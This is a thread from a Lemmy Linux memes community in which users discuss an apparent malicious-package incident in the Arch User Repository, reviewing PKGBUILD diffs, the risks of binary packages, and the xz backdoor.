this post was submitted on 16 Jun 2026
494 points (97.9% liked)

linuxmemes

31781 readers
1195 users here now

Hint: :q!

Sister communities:

Community rules (click to expand)

1. Follow the site-wide rules

2. Be civil
  • Understand the difference between a joke and an insult.
  • Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".
  • Don't get baited into back-and-forth insults. We are not animals.
  • Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
  • Bigotry will not be tolerated.
    • 3. Post Linux-related content
  • Including Unix and BSD.
  • Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.
  • No porn, no politics, no trolling or ragebaiting.
  • Don't come looking for advice, this is not the right community.
    • 4. No recent reposts
  • Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.
    • 5. πŸ‡¬πŸ‡§ Language/язык/Sprache
  • This is primarily an English-speaking community. πŸ‡¬πŸ‡§πŸ‡¦πŸ‡ΊπŸ‡ΊπŸ‡Έ
  • Comments written in other languages are allowed.
  • The substance of a post should be comprehensible for people who only speak English.
  • Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.
    • 6. (NEW!) Regarding public figuresWe all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.
  • Keep discussions polite and free of disparagement.
  • We are never in possession of all of the facts. Defamatory comments will not be tolerated.
  • Discussions that get too heated will be locked and offending comments removed.
    • Β 

    Please report posts and comments that break these rules!

    Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

    founded 3 years ago
    MODERATORS
    poopsmith@lemmy.world
    zephyr@lemmy.world
    rtxn@lemmy.world
    494
    Who could have seen it coming? (sh.itjust.works)
    submitted 1 day ago by ar99644@sh.itjust.works to c/linuxmemes@lemmy.world
    65 comments fedilink hide all child comments
     
    you are viewing a single comment's thread
    view the rest of the comments
    [–] ReginaPhalange@lemmy.world 12 points 1 day ago (2 children)

    Be real for a second,
    Did you, or did you not, manage to review a diff, and say "no, that looks fishy".

    Do you really think you are immune from compromised binary AUR packages thats being downloaded straight from GitHub? Sure, now it's not only the AUR that's bad, but in the end of the day, a malicious binary did arrive at your computer.

    Let's say that you don't use *-bin packages, and only download from compilable source, are you immune from the strategy that the state actor who caused CVE-2024-3094 used to compromise packages?

    [–] tgt@programming.dev 3 points 22 hours ago

    I'm with Cubit on this one. I updated some AUR packages last week. I always do a quick skim through the pkgbuild, and I always check the diffs with respect to my installed version. Auracle clones the git repo for the package, so it's easy to check. It takes more work and, granted, it's a reason they'll stay outdated for longer. I updated 5/34 foreign packages. The others are just not worth it to update every time. And, personally, I have had PKGBUILDs that looked fishy, forgot the functionality I needed, were badly written, wrong dependencies,... and, after looking for alternatives, I just rewrote myself.

    When I learned of the attack I did go and recheck those packages, but they were not impacted... I don't do much node things, so if a node-related package was doing an npm install I might have missed it. But the commit author changing on the git diff I think I would have spotted. So if the attack was more sophisticated and was context dependent, using plausible commands, setting same git committer names, (ab)using files upstream, etc. Then yeah, I might get pwn'ed. But not like this.

    Binaries from aur is asking for trouble, unless you absolutely trust the upstream. E.g. Microsoft, Amazon, ... You can clearly see it in the PKGBUILD. With -git packages, you need to be doubly aware, but if I need it, the alternative is I clone and install it myself, so not much security and probably frustration is gained.

    The xz attack was on a different level, and if I remember correctly, never hit the arch main repo, by pure chance of not being a target. I trust the arch main repo's. The day a key gets stolen, a lot of people will be impacted, so let's hope this aur thing didn't compromise more high profile maintainers...

    Also, we're talking about the AUR, not about upstream. I'm not reading all patches on all main repo packages. And if I wanted to build everything myself I'd be using Gentoo.

    I do understand some people don't want to give the time to all these steps, but the alternative for me is just too bad. It's a time/security trade-off for which everyone sets the weights differently.

    [–] CubitOom@infosec.pub 4 points 1 day ago

    in the end of the day, a malicious binary did arrive at your computer.

    No, it didn't.